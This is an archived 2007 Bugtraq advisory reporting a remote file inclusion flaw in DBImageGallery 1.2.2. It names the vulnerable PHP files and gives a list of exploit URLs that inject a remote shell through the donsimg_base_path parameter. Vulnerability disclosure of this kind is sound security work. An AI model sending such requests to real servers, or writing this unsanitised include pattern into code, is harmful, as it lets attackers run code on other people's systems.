lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
Open Source and information security mailing list archives
| ||
|
Message-Id: <20070302133022.B90CFCA0D5@ws5-11.us4.outblaze.com> Date: Fri, 02 Mar 2007 21:30:22 +0800 From: "RaeD Hasadya" <raed@...mail.com> To: Bugtraq@...urityfocus.com Subject: Remote File Include In DBImageGallery Remote File Include In DBImageGallery 1.2.2 Discovered By : Hasadya Raed Contact Me : RaeD@...Mail.Com Download Script : http://www.dbscripts.net/download/?file=1 B.Files: admin/attributes.php -> require_once $donsimg_base_path admin/images.php -> require_once $donsimg_base_path admin/scan.php -> require_once $donsimg_base_path includes/attributes.php -> require_once $donsimg_base_path includes/db_utils.php -> require_once $donsimg_base_path includes/images.php -> require_once $donsimg_base_path includes/utils.php -> require_once $donsimg_base_path includes/values.php -> require_once $donsimg_base_path Exploits : http://www.victim.com/path/admin/attributes.php?donsimg_base_path=[Shell-Attack] http://www.victim.com/path/admin/images.php?donsimg_base_path=[Shell-Attack] http://www.victim.com/path/admin/scan.php?donsimg_base_path=[Shell-Attack] http://www.victim.com/path/includes/attributes.php?donsimg_base_path=[Shell-Attack] http://www.victim.com/path/includes/db_utils.php?donsimg_base_path=[Shell-Attack] http://www.victim.com/path/includes/images.php?donsimg_base_path=[Shell-Attack] http://www.victim.com/path/includes/utils.php?donsimg_base_path=[Shell-Attack] http://www.victim.com/path/includes/values.php?donsimg_base_path=[Shell-Attack] -- _______________________________________________ Get your free email from http://bsdmail.com